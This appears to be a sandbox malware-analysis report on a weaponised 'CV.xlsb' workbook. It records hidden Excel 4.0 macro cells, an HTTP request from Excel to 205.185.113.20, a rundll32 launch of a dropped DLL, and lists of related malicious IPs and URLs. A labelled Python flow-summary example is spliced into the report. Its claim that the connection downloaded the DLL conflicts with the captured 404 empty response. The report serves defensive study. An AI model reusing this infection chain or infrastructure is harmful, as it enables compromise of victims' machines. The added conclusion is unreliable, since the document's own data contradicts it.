Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLSB@3/5@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125, 52.109.32.27, 52.109.12.21, 52.109.12.24, 13.64.90.137, 104.42.151.234, 104.43.139.144, 51.11.168.160, 52.155.217.156, 20.54.26.129, 93.184.221.240, 51.104.139.180, 23.10.249.26, 23.10.249.43
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, config.officeapps.live.com, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
205.185.113.20 | CV.xlsb | malicious | 205.185.113.20/BVd1qKwd
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/BVd1qKwd
205.185.113.20 | myResume.xlsb (18 separate analyses with identical name, detection and context) | malicious | 205.185.113.20/cXQT5g

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
PONYNETUS | 7840134D.exe | malicious | 167.88.170.103
PONYNETUS | CV.xlsb | malicious | 205.185.113.20
PONYNETUS | https://papyrefb2tdk6czd.onion.ly/ | malicious | 198.251.89.118
PONYNETUS | https://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.ly | malicious | 198.251.89.118
PONYNETUS | http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.ly | malicious | 198.251.89.118
PONYNETUS | SecuriteInfo.com.ArtemisA8D086952534.exe | malicious | 167.88.170.103
PONYNETUS | http://naturalhub-diet.world/shake.php?a=1nou&c=diet&s=330788,UEMRADAPDP38712 | malicious | 209.141.40.184
PONYNETUS | Quickbooks-52598NOV.wsf | malicious | 209.141.42.71
PONYNETUS | https://urlprotection-sjl.global.sonicwall.com/click?PV=1&MSGID=202011121700210567221&URLID=12&ESV=10.0.9.5115&IV=96C84E4D3CD6E1B3687B4725D49ACC48&TT=1605200441368&ESN=o9kvhmPqyp%2BcdCbr6%2B5AlC%2FDxZxbBUV7HS3EcP1G5pA%3D&KV=1536961729279&ENCODED_URL=https%3A%2F%2Fteamgrouppcl-my.sharepoint.com%2F%3Au%3A%2Fg%2Fpersonal%2Fnongluck_m_attconsult_com%2FEUMhZAOXwpNGi0mlED8_GS0BlNUmsBRsk_GjzqCnTE543g%3Fdownload%3D1%26utm_content%3DNewClient%26utm_campaign%3Dwebsite%26utm_source%3DJulyWazePromo%26utm_medium%3DEmail&HK=2880A45B85BD1D7F235772EACD5B24AA03960F780A5D1B62240B80C3C42285F3 | malicious | 209.141.42.71
PONYNETUS | E3FvBBM0A6.exe | malicious | 199.195.250.165
PONYNETUS | jtFF5EQoEE.exe | malicious | 209.141.38.71
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20
PONYNETUS | WKTniKeGUx.exe | malicious | 199.195.250.165
PONYNETUS | Reference Number -MT103-002239389960011.exe | malicious | 167.88.160.137
PONYNETUS | https://bit.ly/3kP7Cn3 | malicious | 209.141.40.184
PONYNETUS | https://bit.ly/2HWBvnh | malicious | 209.141.40.184
PONYNETUS | run32dll.exe | malicious | 198.251.89.29
PONYNETUS | servicess64 - Copy.exe | malicious | 205.185.126.172
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DA768304-9386-4C06-A952-5E2BC6B1C13F
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 129952
Entropy (8bit): 5.37832394575212
Encrypted: false
SSDEEP: 1536:/cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:1mQ9DQW+zBX8u
MD5: AEA5BF70490B9D94F64E57F858BF4F2A
SHA1: 762623EA333E61C4DB03C2E1987E3CE643DFF8FB
SHA-256: 5CEC577D9B9D5FB58FEA54DA3F71FB05C814256F59CFA3E2AEA01C08D2D3470A
SHA-512: DCA3E9BE502348E92C0CEA3C7F116F9C878816BD2392AB4ECC14CD156C14327FAB94560AC83D413947896763BB4468099A7D7ACF440FA68BDD4EF163FE0B5BBE
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T06:13:32">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D84BB939.jpeg
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1011x567, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55961
                                                                                                                                                    Entropy (8bit):7.8745563773940725
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QUQt43PNewplZDlm1ajiDPnp3AvLJ03ntpE3g+O0t2DoV:UwbZRQJAd0MrO0UEV
                                                                                                                                                    MD5:102DCD780DA80675F5038CFB42D936CE
                                                                                                                                                    SHA1:417033D6C45E4209909A2EF7B5436673A74FB164
                                                                                                                                                    SHA-256:88F6B392616EA29C03682E3EC079F58C5E8BDC18C7CCB09BA6D5DC0BEDC13EA8
                                                                                                                                                    SHA-512:6478CD1B6F256ABA81374018B751D4ABE03B99B6A1CCB528D97E2ADA7558373161F002CA7D8D6088E897390F9A0F2CE3E925C604B3F855C1EBAA04E53F01ECEF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: ......JFIF.....`.`.....C....................................................................C.......................................................................7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..~.L.Q._>~.*...M..@.L.2(..RdR..(.2*.....v...F.~=h.z.qv........I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-..h...L.2(.h..ZL..Z(...)2(.....Va@.E&E....RdR.....L.~F(.v.{R'SH...b.6......"...-...dP..I.FE.-...dP..I.F.@.E(.8...L.2(.h..".....P.E......2(..QI.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.....8.....L..Z)2(...."...Z)2(...."...Z
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DFC40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):230247
                                                                                                                                                    Entropy (8bit):7.9534300042758455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:7YQ0uirWMtgX1AmR+BjZ0ba+ZA+2ZOJAd0MrO0UEEjYcuf7bZGL:7/0NablEB902+CxAJAdFrOpEjf7dGL
                                                                                                                                                    MD5:F784321AF3936F35E09681E6519E85D6
                                                                                                                                                    SHA1:2F03E88538A8D09423996AA1C59263C9A04D4BF4
                                                                                                                                                    SHA-256:99E04F322341F56974D2D0A872074E4C2937E65BB4350374EE8A5C33DCE49A5F
                                                                                                                                                    SHA-512:343841BB03BD22C7770E5A4FF669983CFDFEFB54F173C5EA72642AB21094A1DE4898E20D83E62B949BE04A0A26FE443DCA42070BDB0A52B436474CCB92A4222F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .Ko.1......F.V3.n...C.m.l#5...}a\...$.....y.. ..nxy.9......taMu.1i.Z....I.........T).....Z..DN'../..RU.]jI.s8.4...H......G+ry.g4.9.3.|4:...... ..w..+...E.xE.7..T.V..^-.......&=..!.-E....N="..TM...I...CA'.....P...s..qF..:.1......7>./..7O...6..`................?N...h......nz.M..}].....N....-.C.B...Mk........}...H8>!.........$..H8.".`#, ....H2.%R..LeXB.aIU.%V..\eX..aIV.%Y9.d.X..cIV.%Y9.d.X..cIV.V.K..tx<<A....mS^.H/.{t%.......K......wp.(nz..~q......-..y.!..*....[+..u(B...M.....8.B.....M...M..n........PK..........!.6u..............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\~$CV.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.92978748844578
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                    File name:CV.xlsb
                                                                                                                                                    File size:257680
                                                                                                                                                    MD5:08b6718f28bd303f0b407e0ec0f30872
                                                                                                                                                    SHA1:824489d6a73609db8763172a2e9f2e9d9f7c63a4
                                                                                                                                                    SHA256:65d6c6478fb750394d0517f5ff77fa13dfd354dbbec4cff3ec9e897bf8e3e926
                                                                                                                                                    SHA512:b4cd8a99f70c1aea542db3b3eb518b07a23a64d7fe2ebf057cec361ba922dad6b8e979cf0506ac733c3792d99cdff662f45b9b20f282f73bcdc0d08f19e5e029
                                                                                                                                                    SSDEEP:6144:ut2q/WAdBZ5selVUXkh4i6hO10SD5N2ZOJAd0MrO0UE6S+sf1FA:u4q/WIBzMz60SWAJAdFrOpEKsf1+
                                                                                                                                                    File Content Preview:PK..........!...?.....4.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "CV.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

Populated cells of the macro sheet, by dump row (the raw dump lists every cell; all other cells in each row are empty, which is what the "abnormal large hidden Excel 4.0 Macro sheet" signature refers to):

Row 1: =APP.TITLE(BaaCKWySxWnNnysLuRBMSOZqFNOYvqTVCIbjZFzByEovDT) ; i ; =ALERT(vwuzXdkPcbruxpPdWHoqLnsGDlyYYzIVwRvUlMmxrK)
Row 2: 2 ; e ; =CLOSE.ALL() ; J ; =ALERT(an)
Row 3: =CANCEL.KEY(TRUE)

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

Timestamp                            Source port  Dest port  Source IP       Dest IP
Nov 19, 2020 07:13:37.483485937 CET  49730        80         192.168.2.4     205.185.113.20
Nov 19, 2020 07:13:37.636163950 CET  80           49730      205.185.113.20  192.168.2.4
Nov 19, 2020 07:13:37.636300087 CET  49730        80         192.168.2.4     205.185.113.20
Nov 19, 2020 07:13:37.637028933 CET  49730        80         192.168.2.4     205.185.113.20
Nov 19, 2020 07:13:37.789834023 CET  80           49730      205.185.113.20  192.168.2.4
Nov 19, 2020 07:13:37.807643890 CET  80           49730      205.185.113.20  192.168.2.4
Nov 19, 2020 07:13:37.807776928 CET  49730        80         192.168.2.4     205.185.113.20
Nov 19, 2020 07:14:42.814584017 CET  80           49730      205.185.113.20  192.168.2.4
Nov 19, 2020 07:14:42.814827919 CET  49730        80         192.168.2.4     205.185.113.20
Nov 19, 2020 07:15:22.417685032 CET  49730        80         192.168.2.4     205.185.113.20
Nov 19, 2020 07:15:22.570553064 CET  80           49730      205.185.113.20  192.168.2.4
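
An added example, not part of the report, that collapses a packet list like the TCP table above into per-flow summaries, which is the first step when looking for the download or beacon connection in a sandbox capture. PACKETS is the table transcribed row for row; the address of the analysis VM (192.168.2.4) and the treatment of destination port 80 as cleartext HTTP are assumptions.

```python
"""Collapse a sandbox packet list into per-flow summaries.

Added example, not part of the Joe Sandbox report. PACKETS is the report's
TCP Packets table transcribed as (timestamp, src_port, dst_port, src_ip, dst_ip).
"""
from collections import defaultdict
from datetime import datetime

ANALYSIS_HOST = "192.168.2.4"   # assumption: the sandbox VM's own address
REF = datetime(2020, 1, 1)      # arbitrary reference; only differences matter

PACKETS = [
    ("Nov 19, 2020 07:13:37.483485937 CET", 49730, 80, "192.168.2.4", "205.185.113.20"),
    ("Nov 19, 2020 07:13:37.636163950 CET", 80, 49730, "205.185.113.20", "192.168.2.4"),
    ("Nov 19, 2020 07:13:37.636300087 CET", 49730, 80, "192.168.2.4", "205.185.113.20"),
    ("Nov 19, 2020 07:13:37.637028933 CET", 49730, 80, "192.168.2.4", "205.185.113.20"),
    ("Nov 19, 2020 07:13:37.789834023 CET", 80, 49730, "205.185.113.20", "192.168.2.4"),
    ("Nov 19, 2020 07:13:37.807643890 CET", 80, 49730, "205.185.113.20", "192.168.2.4"),
    ("Nov 19, 2020 07:13:37.807776928 CET", 49730, 80, "192.168.2.4", "205.185.113.20"),
    ("Nov 19, 2020 07:14:42.814584017 CET", 80, 49730, "205.185.113.20", "192.168.2.4"),
    ("Nov 19, 2020 07:14:42.814827919 CET", 49730, 80, "192.168.2.4", "205.185.113.20"),
    ("Nov 19, 2020 07:15:22.417685032 CET", 49730, 80, "192.168.2.4", "205.185.113.20"),
    ("Nov 19, 2020 07:15:22.570553064 CET", 80, 49730, "205.185.113.20", "192.168.2.4"),
]


def to_seconds(ts):
    """'Nov 19, 2020 07:13:37.483485937 CET' -> float seconds since REF.

    The sandbox prints nanoseconds, which datetime cannot parse, so the
    fraction is split off and added back by hand. The zone suffix is ignored
    because every row of one report shares it.
    """
    date, clock, _tz = ts.rsplit(" ", 2)
    hms, frac = clock.split(".")
    dt = datetime.strptime(f"{date} {hms}", "%b %d, %Y %H:%M:%S")
    return (dt - REF).total_seconds() + int(frac) / 1e9


def summarize_flows(packets, host=ANALYSIS_HOST):
    """Group packets into flows oriented from the analysis host outward."""
    flows = defaultdict(lambda: {"times": [], "out": 0, "in": 0})
    for ts, sport, dport, sip, dip in packets:
        if sip == host:
            key, direction = (sip, sport, dip, dport), "out"
        else:
            key, direction = (dip, dport, sip, sport), "in"
        flows[key]["times"].append(to_seconds(ts))
        flows[key][direction] += 1

    summaries = []
    for (cip, cport, sip, sport), f in flows.items():
        times = sorted(f["times"])
        gaps = [b - a for a, b in zip(times, times[1:])]
        summaries.append({
            "client": f"{cip}:{cport}",
            "server": f"{sip}:{sport}",
            "packets": len(times),
            "out": f["out"],
            "in": f["in"],
            "duration_s": round(times[-1] - times[0], 3),
            # A long silence inside one connection is a keep-alive or a
            # server-side delay; check it against the HTTP request log.
            "max_gap_s": round(max(gaps), 3) if gaps else 0.0,
            "cleartext_http": sport == 80,   # assumption: port 80 is plain HTTP
        })
    return summaries


if __name__ == "__main__":
    for summary in summarize_flows(PACKETS):
        print(summary)
```

For this report the table reduces to a single connection from the Excel host to 205.185.113.20:80 lasting about 105 seconds with a 65-second idle gap in the middle, which is the download of the DLL that rundll32.exe later loads; the UDP table can be fed to the same function to list the DNS lookups that preceded it.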

                                                                                                                                                    UDP Packets

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 205.185.113.20

                                                                                                                                                    HTTP Packets

Session ID: 0
Source IP: 192.168.2.4
Source Port: 49730
Destination IP: 205.185.113.20
Destination Port: 80
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp: Nov 19, 2020 07:13:37.637028933 CET
kBytes transferred: 264
Direction: OUT
Data:
GET /BVd1qKwd HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 205.185.113.20
                                                                                                                                                    Connection: Keep-Alive
Timestamp: Nov 19, 2020 07:13:37.807643890 CET
kBytes transferred: 271
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Thu, 19 Nov 2020 06:13:37 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    Expires: 0
                                                                                                                                                    Last-Modified: Thu, 19 Nov 2020 06:13:37 GMT
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: _subid=1p924021ov5;Expires=Sunday, 20-Dec-2020 06:13:37 GMT;Max-Age=2678400;Path=/
                                                                                                                                                    Vary: Accept-Encoding


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Memory Usage

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Behavior

                                                                                                                                                    System Behavior

                                                                                                                                                    General

Start time: 07:13:31
Start date: 19/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x1160000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                    General

Start time: 07:13:38
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Imagebase: 0xf90000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis
